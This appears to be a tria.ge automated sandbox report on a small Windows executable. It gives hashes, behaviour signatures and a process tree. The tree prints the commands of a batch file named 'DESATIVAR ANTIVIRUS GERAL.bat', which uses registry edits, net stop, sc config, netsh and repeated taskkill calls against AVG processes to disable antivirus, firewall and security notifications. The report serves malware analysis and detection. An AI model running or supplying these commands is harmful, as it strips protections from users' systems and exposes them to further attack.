Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64 arch:x86 image:win7-20240708-en locale:en-us os:windows7-x64 system
  • submitted
    12/07/2024, 14:05

General

  • Target

    3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe

  • Size

    36KB

  • MD5

    3dadd87327e92b402f5d02952eb256cf

  • SHA1

    4dfc944c3cd1e1e7756b0975ce1212687848412b

  • SHA256

    42a03a01291ad18b2f57364b99fedf6ecbdf97ef25416f64556757a3fc2760f2

  • SHA512

    8451110acfb23cd19709a544e79e7e6d1b2207a7825cdd9d7067af01f5dd02a900275accdfe7f85daffa3bd2962a96d09b466b48d4f6acb8dc6fb969238d173f

  • SSDEEP

    768:82gpFmvbXimSBlWRVJqYOF6dXm3jI3bOmcO:+KiYAF65m3jMcO

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Windows security bypass 2 TTPs 3 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Kills process with taskkill 24 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\2AF.tmp\DESATIVAR ANTIVIRUS GERAL.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\software\microsoft\security center" /f /v AntiVirusDisableNotify /t REG_DWORD /d 1
        3⤵
        • Windows security bypass
        PID:2644
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\software\microsoft\security center" /f /v FirewallDisableNotify /t REG_DWORD /d 1
        3⤵
        • Windows security bypass
        PID:2764
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\software\microsoft\security center" /f /v UpdatesDisableNotify /t REG_DWORD /d 1
        3⤵
        • Windows security bypass
        PID:2116
      • C:\Windows\SysWOW64\net.exe
        net stop SharedAccess
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SharedAccess
          4⤵
          PID:2708
      • C:\Windows\SysWOW64\net.exe
        net stop wscsvc
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop wscsvc
          4⤵
          PID:2812
      • C:\Windows\SysWOW64\sc.exe
        sc config wscsvc start= disabled
        3⤵
        • Launches sc.exe
        PID:2776
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:3056
      • C:\Windows\SysWOW64\sc.exe
        sc config antivirservice start= disabled
        3⤵
        • Launches sc.exe
        PID:2640
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgcsrvx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:584
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgemc.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgrsx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1764
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgchsvx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgnsx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2900
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgwdsvc.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2908
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgcsrvx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2568
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgemc.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2196
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgrsx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:620
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgchsvx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2816
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgnsx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2852
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgwdsvc.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1980
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgcsrvx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:764
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgemc.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgrsx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgchsvx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2380
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgnsx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2952
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgwdsvc.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2052
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgcsrvx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2000
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgemc.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1440
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgrsx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:408
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgchsvx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2300
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgnsx.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:944
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im avgwdsvc.exe /t
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:924

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\2AF.tmp\DESATIVAR ANTIVIRUS GERAL.bat

    Filesize

    1KB

    MD5

    5d8d11c356ba744b6954b9a5cb3a4618

    SHA1

    1eb904f7401929fcbdc7efbd9e33a674a7ccb17f

    SHA256

    7ca23f66dcef0342d305d6c186614739312df87f27c26233b11aac54406fbd21

    SHA512

    d8aa07044290308db09ca0c6bfa9d885f9ac16d3a6558a0cff84be609364833486f40a9ea25a2df347fa2d0c4ba4267a9e5fc37f733654314a212925675a5c58